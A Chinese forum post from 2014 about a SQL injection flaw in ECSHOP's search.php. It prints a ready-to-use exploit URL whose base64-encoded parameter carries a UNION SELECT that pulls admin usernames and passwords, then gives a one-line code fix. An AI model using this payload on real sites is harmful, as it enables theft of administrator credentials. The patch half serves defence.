设为首页收藏本站电话:0551-62380569
切换到宽版

网站推广-网站优化-合肥久飞SEO论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

网站推广-网站优化-合肥久飞SEO论坛»论坛首页 资源分享互助 服务器搭建相关 ECSHOP惊爆search.php的注入漏洞0day
返回列表 发新帖
查看: 264|回复: 0

ECSHOP惊爆search.php的注入漏洞0day

[复制链接]
发表于 2014-6-7 23:58:26 | 显示全部楼层 |阅读模式
search.php的注入漏洞 ecshop search.php的注入漏洞-爆出管理员密码!
利用语句:
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code

解决方案
search.php

大概源码300行左右
  1. if (is_not_null($val) )
复制代码

修改为
  1. if (is_not_null($val) && is_numeric($key))
复制代码


本文地址: https://jiufei.net/bbs/thread-11497-1-1.html
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|合肥网站优化,合肥百度优化,合肥网络推广,合肥SEO优化论坛 ( 皖ICP备2022014487号-2 )

GMT+8, 2025-1-31 07:44 , Processed in 0.064495 second(s), 15 queries , File On.

Powered by jiufei X3.4

© 2008-2020 www.jiufei.net

快速回复 返回顶部 返回列表